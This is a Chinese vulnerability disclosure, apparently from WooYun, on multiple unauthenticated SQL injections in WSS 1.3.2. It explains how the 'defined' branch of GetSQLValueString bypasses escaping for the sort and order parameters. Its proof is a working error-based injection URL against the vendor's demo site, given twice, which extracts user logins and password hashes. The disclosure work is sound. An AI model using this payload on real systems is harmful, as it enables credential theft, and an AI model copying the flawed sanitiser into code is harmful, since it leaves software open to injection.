WSS最新版多处SQL注入直接获取数据三（官方demo演示及快速定位漏洞技巧）

### 简要描述： WSS最新版多处SQL注入直接获取数据三，官方demo演示，这里存在多处，对同一问题进行总结 ### 详细说明： WSS最新版1.3.2，这里存在多处，并对此同一问题进行总结，以及快速查找同一问题全部漏洞 ``` 这里的漏洞没有任何权限限制，任何用户都能进行注入 ``` 漏洞分析： [WooYun: WSS最新版某处SQL注入直接获取数据二（两处）](http://www.wooyun.org/bugs/wooyun-2014-084139) WSS最新版某处SQL注入直接获取数据二（两处） 这个漏洞之前已经降到了漏洞的过程 因为全局过滤函数设计缺陷导致sql注入 ``` if (!function_exists("GetSQLValueString")) { function GetSQLValueString($theValue, $theType, $theDefinedValue = "", $theNotDefinedValue = "") { if (PHP_VERSION < 6) { $theValue = get_magic_quotes_gpc() ? stripslashes($theValue) : $theValue; } $theValue = function_exists("mysql_real_escape_string") ? mysql_real_escape_string($theValue) : mysql_escape_string($theValue); switch ($theType) { case "text": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "long": case "int": $theValue = ($theValue != "") ? intval($theValue) : "NULL"; break; case "double": $theValue = ($theValue != "") ? doubleval($theValue) : "NULL"; break; case "date": $theValue = ($theValue != "") ? "'" . $theValue . "'" : "NULL"; break; case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; break; } return $theValue; } } ``` 看这里 ``` case "defined": $theValue = ($theValue != "") ? $theDefinedValue : $theNotDefinedValue; ``` 如果进到这里的话，就等于没有进行任何处理，然后返回了相应数据 恰恰在程序里面很大地方都使用了这里的defined值，导致过滤无效 漏洞定位： 我们全局搜索： ``` "defined", ``` 得到6处存在漏洞的地方： [<img src="https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/211728428813a4f7a754ce4009baa01742f3ed42.png) default_user.php上一个漏洞已经详细分析过了 这里我们看看control_project.php和control_task.php 以control_task.php为例： ``` ...... $sortlist = "csa_last_update"; if (isset($_GET['sort'])) { $sortlist = $_GET['sort']; } $orderlist = "DESC"; if (isset($_GET['order'])) { $orderlist= $_GET['order']; } ...... $query_Recordset1 = sprintf("SELECT *, tk_project.project_name as project_name_prt, tk_user1.tk_display_name as tk_display_name1, tk_user2.tk_display_name as tk_display_name2 FROM tk_task inner join tk_task_tpye on tk_task.csa_type=tk_task_tpye.id inner join tk_project on tk_task.csa_project=tk_project.id inner join tk_user as tk_user1 on tk_task.csa_to_user=tk_user1.uid inner join tk_user as tk_user2 on tk_task.csa_from_user=tk_user2.uid inner join tk_status on tk_task.csa_remark2=tk_status.id $where (tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st <=%s AND tk_task.csa_plan_et >=%s OR tk_task.csa_plan_st >=%s AND tk_task.csa_plan_et <=%s) ORDER BY %s %s", GetSQLValueString($startday , "text"), GetSQLValueString($startday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($startday , "text"), GetSQLValueString($endday , "text"), GetSQLValueString($sortlist, "defined", $sortlist, "NULL"), GetSQLValueString($orderlist, "defined", $orderlist, "NULL") ); $query_limit_Recordset1 = sprintf("%s LIMIT %d, %d", $query_Recordset1, $startRow_Recordset1, $maxRows_Recordset1); $Recordset1 = mysql_query($query_limit_Recordset1, $tankdb) or die(mysql_error()); $row_Recordset1 = mysql_fetch_assoc($Recordset1); ``` 漏洞原理跟上一个漏洞一致 都是sort和order参数进入GetSQLValueString函数后，使用了defined类型，导致过滤失效 这里直接访问control_project.php和control_task.php是不行的，会报错 且这里存在绝对路径泄露： [<img src="https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21173055ebdd176997f288d1f159401fe1e34a38.png) 那么肯定是在其他地方调用了 我们继续全局搜索： ``` control_project ``` 在/project.php调用： ``` <div class="pagemargin"> <?php require('control_project.php'); ?> </div> ``` 继续搜索 ``` control_task ``` 在/index.php调用： ``` <div class="pagemargin"> <?php require('control_task.php'); ?> </div> ``` 因为在index.php和project.php页面，且control_project.php和control_task.php没有权限限制，全部用户都有权限访问 下面我们在官方demo测试 ### 漏洞证明： 官方demo是最新正式版1.3.2 ``` http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27 ``` [<img src="https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/2117375001f9a4da3b66f6d6bd51cc978ec39495.png) ``` http://wssys.sinaapp.com/project.php?sort=uid%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(select%20concat(0x23,tk_user_login,0x23,tk_user_pass)%20from%20tk_user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%23&order=222222%27 ``` [<img src="https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/21173803ca48996b92e2d053cf31434fed43a910.png)